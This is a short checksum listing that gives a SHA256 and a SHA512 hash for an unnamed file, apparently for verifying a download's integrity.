SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97